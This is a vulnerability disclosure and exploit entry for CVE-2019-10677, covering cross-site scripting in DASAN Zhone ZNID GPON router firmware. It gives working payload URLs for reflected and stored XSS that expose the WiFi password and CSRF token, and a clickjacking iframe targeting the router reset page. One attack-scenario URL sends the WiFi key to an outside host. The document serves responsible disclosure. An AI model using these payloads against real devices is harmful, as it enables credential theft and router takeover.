CVE-2019-10677 – Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU

Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters. This vulnerability affects all zNID(s) models running following firmware versions: all releases of 3.0.xxx SW (on 3.0 branch), release 3.1.349 and earlier (on 3.1 branch), release 3.2.087 and earlier (on 3.2 branch), release 4.1.253 and earlier (on 4.1 branch), release 5.0.019 and earlier (on 5.0 branch). Details: https://blog.redteam.pl/2019/09/cve-2019-10677-dasan-zhone-znid.html

# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU
# Date: 31.03.2019
# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl
# Vendor Homepage: https://dasanzhone.com
# Version: <= S3.1.285
# Alternate Version: <= S3.0.738
# Tested on: version S3.1.285 (alternate version S3.0.738)
# CVE : CVE-2019-10677

= Reflected Cross-Site Scripting (XSS) =
http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp

= Stored Cross-Site Scripting (XSS) =
* WiFi network plaintext password
http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//
* CSRF token
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//

= Clickjacking =
<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>

= Attack scenario =
http://admin:[email protected]/wlsecrefresh.wl?wl_wsc_reg=';document.location=/*&wlWscCfgMethod=*/'//redteam.pl/'%2BwpaPskKey;//

See the Competencies of Our Team

Our team identified and responsibly disclosed multiple critical and high rated vulnerabilities in popular global utilized products. We received acknowledgements eg. from the following organisations:

Netflix
Google
Microsoft
Apple
VMware
Mozilla